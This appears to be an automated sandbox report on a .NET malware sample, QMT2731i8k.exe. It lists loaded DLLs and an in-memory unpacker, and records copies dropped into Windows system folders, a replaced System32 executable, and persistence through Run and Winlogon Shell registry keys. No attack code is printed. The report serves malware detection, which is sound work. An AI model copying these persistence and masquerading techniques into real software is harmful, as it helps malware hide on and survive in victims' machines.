Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: sspicli.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: mscoree.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: version.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: uxtheme.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: wldp.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: amsi.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: userenv.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: profapi.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: windows.storage.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptsp.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: rsaenh.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptbase.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: sspicli.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: mscoree.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: apphelp.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: version.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: wldp.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: amsi.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: userenv.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: profapi.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: apphelp.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: amsi.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: userenv.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Section loaded: sspicli.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: mscoree.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: version.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: uxtheme.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: wldp.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: amsi.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: userenv.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: profapi.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: windows.storage.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptsp.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: rsaenh.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: cryptbase.dll
Source: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\QMT2731i8k.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\QMT2731i8k.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: QMT2731i8k.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QMT2731i8k.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: 7C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.pdb source: QMT2731i8k.exe, 00000000.00000002.1677840960.0000000002E09000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: QMT2731i8k.exe, _.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: qioiNOJzhriMVnsRuLz.exe.0.dr, _.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: qioiNOJzhriMVnsRuLz.exe0.0.dr, _.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: qioiNOJzhriMVnsRuLz.exe1.0.dr, _.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: qioiNOJzhriMVnsRuLz.exe2.0.dr, _.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: qioiNOJzhriMVnsRuLz.exe3.0.dr, _.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, sgG.cs	.Net Code: method_0 System.Reflection.Assembly.Load(byte[])
Source: 0.2.QMT2731i8k.exe.2480000.5.raw.unpack, Class4.cs	.Net Code: H86

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline"
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5dfstyj\w5dfstyj.cmdline"			Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 0_2_00007FFD9B88BF78 pushad ; ret	0_2_00007FFD9B8E34E9
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 0_2_00007FFD9B890462 pushad ; ret	0_2_00007FFD9B890463
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 0_2_00007FFD9B9E8A91 push ecx; iretd	0_2_00007FFD9B9E8A92
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Code function: 0_2_00007FFD9B9E9AB5 push ecx; iretd	0_2_00007FFD9B9E9AB6
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BACBF78 pushad ; ret	8_2_00007FFD9BB234E9
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BAD0462 pushad ; ret	8_2_00007FFD9BAD0463
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC23BCF push ss; retf	8_2_00007FFD9BC2403A
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC3782E pushad ; iretd	8_2_00007FFD9BC3785D
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC24038 push ss; retf	8_2_00007FFD9BC2403A
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC22C25 push cs; retf	8_2_00007FFD9BC22C4A
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC2AB99 push edx; retf	8_2_00007FFD9BC2AB9A
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC2AB39 push edx; retf	8_2_00007FFD9BC2AB5A
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC2AEF5 push ebp; retf	8_2_00007FFD9BC2AF0A
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC2AEB5 push esp; retf	8_2_00007FFD9BC2AECA
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC221E5 push es; retf	8_2_00007FFD9BC221FA
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Code function: 8_2_00007FFD9BC3785E push eax; iretd	8_2_00007FFD9BC3786D

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown	Executable created and started: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe
Source: unknown	Executable created and started: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe
Source: C:\Windows\System32\cmd.exe	Executable created and started: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\user\Desktop\PDeJzYJR.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File created: C:\Users\user\Desktop\kfyxwSYJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File created: C:\Users\user\Desktop\zBjMJrtf.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Recovery\qioiNOJzhriMVnsRuLz.exe	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File created: C:\Users\user\Desktop\YLzRFcIi.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\user\Desktop\EPzTPNOj.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\user\Desktop\ZmxZjBOz.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\user\Desktop\GZVUPftk.log	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File created: C:\Users\user\Desktop\hpHHpWYQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\user\Desktop\TtUAGVJK.log	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File created: C:\Users\user\Desktop\WBdQFKdi.log	Jump to dropped file

Source: C:\Users\user\Desktop\QMT2731i8k.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe

Jump to dropped file

Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\ImmersiveControlPanel\qioiNOJzhriMVnsRuLz.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Windows\twain_32\qioiNOJzhriMVnsRuLz.exe	Jump to dropped file

Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\user\Desktop\TtUAGVJK.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\user\Desktop\ZmxZjBOz.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\user\Desktop\PDeJzYJR.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\user\Desktop\GZVUPftk.log	Jump to dropped file
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\user\Desktop\EPzTPNOj.log	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File created: C:\Users\user\Desktop\kfyxwSYJ.log	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File created: C:\Users\user\Desktop\zBjMJrtf.log	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File created: C:\Users\user\Desktop\hpHHpWYQ.log	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File created: C:\Users\user\Desktop\YLzRFcIi.log	Jump to dropped file
Source: C:\Windows\ModemLogs\qioiNOJzhriMVnsRuLz.exe	File created: C:\Users\user\Desktop\WBdQFKdi.log	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\Desktop\QMT2731i8k.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QMT2731i8k			Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz			Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\All Users\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qioiNOJzhriMVnsRuLz.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	File created: C:\Users\All Users\Start Menu\Programs\1f2b6125644fa3	Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QMT2731i8k	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run QMT2731i8k	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qioiNOJzhriMVnsRuLz	Jump to behavior

Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QMT2731i8k.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
